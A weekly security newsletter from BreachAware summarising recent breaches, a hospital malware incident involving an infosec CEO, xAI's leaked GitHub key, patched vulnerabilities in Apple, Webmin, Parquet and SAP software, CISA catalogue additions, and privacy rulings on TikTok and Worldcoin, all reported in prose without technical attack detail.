Weekly Summary

SPOTLIGHT, VULNERABILITY CHAT & PRIVACY HEADLINES
Share this analysis
Record

When CEOs Hack, xAI Fumbles, and Your iPhone Becomes a Brick.

05 May 2025
BREACHAWARE HQ

A total of 22 breaches were found and analysed resulting in 19,421,865 leaked accounts containing a total of 35 different data types. The breaches found publicly and freely available included ULP Alien TxT File - Episode 11, Doxagram, Grayscale, Underworld Empire Forums and ULP 0017. Sign in to view the full BreachAware Breach Index which includes, where available, reference articles relating to each breach.

SPOTLIGHT

In an astonishing case of “what not to do as a cybersecurity professional,” Jeffery Bowie, CEO of a small infosec firm, has landed in serious trouble after trying to install malware in St. Anthony Hospital in Oklahoma City. Hospital staff caught Bowie acting suspiciously on both a staff and guest computer. When questioned, he claimed to be visiting a family member.

Specialists later discovered malware on one of the machines, a PowerShell script set to take screenshots every 20 minutes and send them to a remote host. Bowie, instead of keeping quiet and speaking to legal counsel, went full damage control via LinkedIn. His post admitted the malware was written “on the fly” using public access computers and added this gem:

“I wouldn’t have touched a single device had my botched mental health treatment not induced delusions/paranoia.”

He claimed the malware was removed after collecting screenshots of a DFIR host and complained that the incident cost him $12K in revenue. He wrapped up the post by pitching himself to media outlets but only if they’re willing to pay him via CashApp or Apple Cash. Incredible scenes.

Elon Musk’s AI startup xAI has suffered a serious internal blunder. A developer accidentally leaked a private GitHub key, which could have granted access to proprietary AI code and models powering SpaceX, Tesla, and X (formerly Twitter). The key was found and reported by GitGuardian, but it took xAI nearly two months to respond and revoke the exposed credentials.

That kind of delay in response to a high-risk vulnerability has raised eyebrows, especially considering the fierce competition in the LLM space. No confirmation yet on whether the key was ever used, but you can bet rival companies were paying close attention.

Apple has quietly patched a nasty zero-day vulnerability affecting its Darwin notifications system, a legacy API still used across iOS. Exploiting it could send an iPhone into an endless reboot cycle, effectively bricking the device. And it only required a single line of malicious code to trigger.

The bug was responsibly disclosed by a security researcher, who received a $17,500 bounty from Apple. The update has already been rolled out, so make sure your device is running the latest iOS version or risk your iPhone turning into an overpriced paperweight.


VULNERABILITY CHAT

Researchers at Oligo have uncovered a set of security vulnerabilities, now patched, in Apple’s AirPlay protocol. Dubbed AirBorne, the flaws posed a serious risk by potentially allowing attackers to hijack vulnerable devices that rely on the proprietary wireless technology.

A newly discovered vulnerability in Webmin has been found to let remote attackers escalate privileges and execute code with root-level access. In a forum update, Webmin emphasised the urgency of the 2.302 release, describing it as “high priority” while also introducing improvements to SSH server management and firewall rule APIs.

Apache Parquet’s Java library has also come under scrutiny after the disclosure of a vulnerability that can be exploited through specially crafted Parquet files. An advisory from the Apache Software Foundation confirms that schema parsing in the parquet-avro module up to version 1.15.0 may allow attackers to run arbitrary code.

A flaw identified by Reliaquest in SAP NetWeaver Visual Composer has led to confirmed breaches at multiple organisations. Researchers have warned that over 7,500 SAP NetWeaver Application Servers remain exposed, heightening the risk of further compromises.

In a concerning development, Sansec has revealed a supply chain attack affecting 21 widely used e-commerce applications. The attack has enabled hackers to gain full control over hundreds of online stores, with estimates indicating that between 500 and 1,000 stores are running compromised software. Among the victims is a $40 billion multinational retailer, and active exploitation has been observed since at least April 20, 2025.

8 Common Vulnerability and Exposure (CVEs) were added to the CyberSecurity & Infrastructure Security Agency's (CISA) 'Known Exploited Vulnerabilities Catalog' last week including:
- Broadcom, Brocade Fabric OS
- Qualitia, Active! Mail
- Commvault, Web Server
- SAP, NetWeaver
- Apache, HTTP Server
- SonicWall, SMA100 Appliances
- Commvault, Command Center
- Yiiframework, Yii
See the full catalog here: https://www.cisa.gov/known-exploited-vulnerabilities-catalog

NIST's National Vulnerability Database (NVD), the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP), has published 1,078 vulnerabilities during the last week, making the 2025 total 16,839. For more information visit https://nvd.nist.gov/vuln/search/

INFORMATION PRIVACY HEADLINES

Europe is set to prohibit anonymous cryptocurrency accounts and privacy coins starting in 2027, as part of an expansive new Anti-Money Laundering Regulation. This sweeping reform will bar credit institutions, financial firms, and crypto asset service providers from offering anonymous services or handling privacy-focused tokens, targeting anonymity at the core of token transactions.

Ireland’s Data Protection Commission has hit TikTok with a 530 million euro ($600 million) fine following a four-year probe into data transfers that exposed users to potential surveillance by China. The company responded in a blog post, emphasising that the decision relates to a specific time frame ending in May 2023, before it launched its data localisation effort, Project Clover, which includes constructing three data centres across Europe.

Sam’s Club is transitioning to a register-free, AI-driven shopping model, aiming to streamline the customer experience with fully digital interactions. Yet, this innovation has triggered concern from consumer advocates who warn that such extensive data collection may lead to price manipulation, pushing higher-priced goods while downplaying discounts based on individual shopping profiles.

In a landmark ruling, a Kenyan court has ordered Worldcoin to delete biometric data it collected unlawfully from thousands of citizens. The ruling stems from the company’s use of orbs to scan individuals’ irises in exchange for cryptocurrency, a process deemed illegal due to the absence of meaningful consent and the lack of a required Data Protection Impact Assessment under national law.

Breach Exposure Monitoring | Dark Web Monitoring + Surface Web Monitoring
Scan Any Domain for Free https://breachaware.com/scan

Data Categories Discovered

Contact, Finance, Digital Behaviour, Communication Logs, Academic, Relationships, Sociodemographic, Human Behaviour, Commerce, National Identifiers, Unstructured, Technology, Career, Geolocation.

  • Key Statistics
  • Breaches Discovered
    0
  • ACCOUNTS DISCOVERED
    0
  • DATA TYPES DISCOVERED
    0